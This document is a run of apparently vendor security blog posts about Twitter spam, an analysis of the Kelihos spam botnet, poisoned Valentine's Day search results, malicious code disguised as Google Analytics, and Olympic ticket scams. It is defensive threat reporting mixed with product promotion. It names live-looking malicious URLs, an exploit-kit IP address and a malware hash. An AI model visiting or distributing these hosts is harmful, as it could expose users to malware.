There have been reports from several sources that Twitter is fast approaching the milestone of 500 million users.  We take a look at what this could mean for us all and take a reflective look back on some of the issues that Twitter users have faced over the years.

What does that figure mean to us?

• This number of Twitter users is 60% more than the population of the United States of America (according to the U.S. Census Bureau).
• That figure is 8 times the population of the United Kingdom.
• The approximate human population of Earth in 1550 AD was 500 million.

Of course, not all Twitter users are who they claim to be.

You are probably familiar with seeing a picture of an attractive individual gracing your follower list and then realizing that the follower is just trying to pass off suspect medication. The abuse of Twitter by spammers and bot networks is nothing new and something we have seen in Websense® Security Labs™ for several years now. Over the past few years, we have seen bot networks take their instruction from generated Twitter users. We have also seen website compromises on a massive scale using Twitter trending topics to generate the malicious domain they contact next.

Malware authors and spammers jump on social networks in the hope that they can quickly spread their wares: 500 million users, 200 million users, even 100 million users provide the scale and network connectivity to do exactly this.

Here are some of the not-so-high Twitter highlights of the last 5 years:

Is there any hope?

Behind every cloud is a silver lining and Twitter is no exception.  Our Websense Social Web Controls as well as our ThreatSeeker® Network can help to limit the exposure from threats on social networks. You can find out more on www.websense.com

From bread bakers to candlestick makers, from celebrities to pharmacists, 500 million users/spammers/bots have turned to Twitter to share their lives and engage in 140-character exchanges with others. Have you?

Regards,

https://twitter.com/websenselabs

During the past months, the spam engine Kelihos has attracted the attention of many people, including security company researchers and analysts. Very interesting also was the recent official Microsoft response  where has been confirmed a new generation of Kelihos variants derived from the previous. The Websense® Security Labs™ Spam Trap system has detected a variant of Kelihos that is apparently still active.

We focused our research on trying to uncover the Kelihos command and control infrastructure and P2P network, along with some features of the botnet that we could recognize, including enhancements. The first interesting thing we noticed was in a sample of the network traffic generated by the bot before it starts its spam activity. As shown below, the bot generates a first request to an IP address that is listening on HTTP port 80:

We detected encrypted traffic between the "infected" host and the IP addresses shown above. The server contacted by the bot answers with another encrypted network stream. Before the bot starts to generate spam, it contacts another IP address, this time with an HTTP GET request, as shown in the following screen shot:

In this screen shot, we see that the "User-Agent" header string specifies a dodgy user agent, and that the traffic between the URL requested by the bot and the contacted server seems to be encrypted. Our investigation found that the last stream received by the bot is the configuration information that permits it to begin generating spam. This information includes the targeted countries, a list of recipients, a template for the email body, and a list of MX records needed to start the campaign.

From the statistic analysis of this binary (MD5 021EC96775A37AE92680C076295D5991), we can confirm that the new generation of Kelihos uses an encryption mechanism based on Blowfish. Using some of our tools of the trade, we reversed the binary and detected evidence of a statically linked instance of the cryptographic open source library called Crypto++. Further investigation using a tool called PEiD provided the needed confirmation of this:

.

This knowledge permitted us to start a more detailed investigation using a reverse engineering process. After we observed that the first IP address contacted by the bot was changed using a non-apparent criterion, we started to understand where that IP address was retrieved. We were unable to retrieve anything from a memory dump during the bot's runtime. However, a review of the memory contents revealed that some "hard coded" information in the bot was protected by a sort of in-memory mechanism based on encoding and encryption. In other words, the vital parameters that allow this bot to exist were not easily detectable because they were located in an area of the code where custom obfuscation was applied. When we looked for some IP addresses in memory, we detected the code routine used to decrypt the IP addresses (probably all compromised hosts). What follow is a dump snippet from the memory after the decryption routine:

The above screen shot shows the area of the bot's memory after the decryption routine extracts the first IP address to contact. The bot then starts the network conversation that we showed in the network traffic screen shot at the beginning of this blog. We found a total of 499 IP addresses in the bot's memory. Extracting this list from the bot, we can (thanks to Google Maps) represent graphically how widespread the Kelihos command and control and peers infrastructure is. The following illustration shows the geographical distribution of just 100 of those IP addresses chosen randomly from the list. Given the numerous locations shown, you can see how well this botnet is protected:

When we extracted the country code from the IP addresses, we generated the following graph, which shows the 20 countries that are home to most of the Kelihos command and control and peers systems:

More investigation of Kelihos spam activity revealed that this botnet is involved in several malicious campaigns, including the following phishing attempt:

Our Websense ThreatSeeker® network can detect this spam activity and block the communication between the Kelihos bot and its command and control and peers structure. The following screen shot shows how a Websense customer is protected against the phishing attempt shown in the mail above:

During our investigation, we also detected and trapped the following email messages generated by the Kelihos bot. We can see from this list that the campaign is targeted primarily for European and USA email addresses:

We could say much more about the Kelihos botnet. For example, the code seems to be derived and recycled from or other malicious code close to Waledac variants. We have detected some evidence of Infostealer activities targeting well-known FTP clients, the presence of a routine that acts like a Bitcoin wallet stealer, and a list of suspicious User Agents used by the bot to contact its command and control and other peers machines. Anyway, the most important thing derived from this analysis is that we have retrieved the entire list of the command and control systems.

Websense customers are protected from these threats by ACE^TM, our Advanced Classification Engine.

Valentine’s Day is here, and stores are flooded with flowers, chocolates, and gift cards. Showing appreciation to your significant other(s) with a box of expensive chocolates has become a tradition, but Googling to find the perfect gourmet chocolate gift has never been more dangerous.

Events such as Valentine’s Day are a prime target for many hackers. Because large numbers of people search using similar terms—in this case, “Valentine’s Day chocolates”—hackers can drive a lot of traffic to a site in a short period of time. In the first three pages of results, you can stumble across an apparently harmless site leading to potential exploits and malware that could have a catastrophic effect on the computer.

At first glance, the site below seems harmless. When we take a closer look at its source code, however, we see an interesting iframe.

The source code shows an iframe in the top left corner of the page.

On the surface, the source code of the URL http://bigdeal777.com/gate.php?f=956993 seems to have no content, but when we review the site using internal Websense mining tools, we find that the source code actually contains an exploit kit that uses several PC vulnerabilities to push malware onto the system.

Websense customers are protected from these threats by ACE^TM, our Advanced Classification Engine.

The Websense® ThreatSeeker® Network has discovered a new wave of injection of malicious code disguising itself as Google Analytics, by adopting similar code snippets and malicious domains.

It is quite convincing at first glance, but remember, usually we put the analytics code at the bottom of the page, instead of at the top, so this is a good hint to Web masters. Another hint is that they are using "UA-XXXXX-X", a placeholder as their "Google Analytics account", obviously this is not what people usually do. We found other similar domains like google-analytics[dot]su in this attack, and will update once we find more. The evil ga.js code is as below:

it is highly obfuscated, hard to understand, but after all tricks it finally will redirect to IP address 37.59.74.145 which hosts Black Hole Exploit.

 Websense customers are protected from these threats by ACE^TM, our Advanced Classification Engine.

Shady ticket deals for the 2012 London Olympics? Hardly surprising. But when the source is Google's famous AdWords advertising service—one of the internet giant's main sources of income—then a double take might be in order.

A BBC investigation found that a Google search for "olympic tickets" resulted in top-of-the-page placement of sponsored sites for vendors selling tickets without permission from Olympic authorities, which is a criminal offense in the U.K. under the London Olympic Games and Paralympic Games Act 2006.

Our research confirmed that the Google search shown below displays an AdWords link

that is not authorized to sell Olympic tickets according to the ticketing website checker on the official London Olympics website.

The prominent display of sponsored ads tends to confer on them a sense of legitimacy. Users may assume that Google has approved the businesses, or at least stands behind them in some way. But in response to a complaint from a would-be Olympic ticket purchaser, Google said, "While Google AdWords provides a platform for companies to advertise their services, we are not responsible for, nor are we able to monitor the actions of each company."

The inner workings of AdWords are complex and opaque. These qualities are essential, because if Google revealed its algorithms, for example, people could easily cheat their way to the top. While the automated system does take into account something called "Quality Score" and consumer ratings, it's clearly not foolproof. A filtering system flags certain keywords for manual review and removal if the ad is found to violate Google's policies, and users can also fill out an online complaint form. Due to the volume of ads, however, a questionable ad may be up for some time before it is reviewed.

Websense® researchers investigated some of  the Olympic ticket scam sites. We found that most of them had multiple backlinks, suggesting they have been widely spammed over the internet in addition to being promoted via Google AdWords. A "backlink" is a hyperlink that links to a specific web page. Both legitimate web pages and spam URLs often try to set up as many backlinks as possible to drive traffic to their sites, and the number of backlinks a site has may affect its ranking in search engine results. Like the hyperlnks in this post, links can be used to provide additional context, information, or examples.

An examination of these backlinks confirmed that "birds of a [bad] feather flock together." One URL yielded 500 backlinking URLs in categories such as Adult Material, Gambling, Proxy Avoidance, Potentially Unwanted Software, Suspicious Embedded Links, and Malicious Embedded Links.

A set of 375 backlinks for another URL found that 104 (27.73%) included various kinds of objectionable content, including security risks (the remaining URLs either had no backlinks or had backlinks for legitimate sites such as News and Media, Business and Economy, and so on).  The breakdown for objectionable/security risk backlinks was as follows:

A closer look at just one of the backlinks tells us a lot about the dangers of allowing comments that are not moderated to be added to any site. In this case, a perfectly legitimate website for a church posted a video of a Sunday School Christmas play and invited viewers to comment:

Viewers and spammers did exactly that, adding links not only to the Olympic ticket scam we started with, but also to a variety of other completely unrelated businesses which may or may not be legitimate, including German gambling and phone sex sites and an Italian "escort" agency:

Defensio from Websense is one way to prevent spammers from posting such links on blogs and other social media, including Facebook pages. With this service, it's easy to block and manage comments, protecting you and your followers from comment spam, malware, and other threats embedded in user-generated content.

With Google searches as with everything else, do your own "due diligence" before making a transaction, even if the business is at the top of the page. In the case of London Olympics tickets, the official website includes the handy ticketing website checker that we used to determine if a URL is recognized as an authorized vendor. There's also a page about staying safe online, which includes a long list of known scams that will only get longer as the July 27 opening day approaches.

Websense customers are protected from these threats by ACE^TM, our Advanced Classification Engine.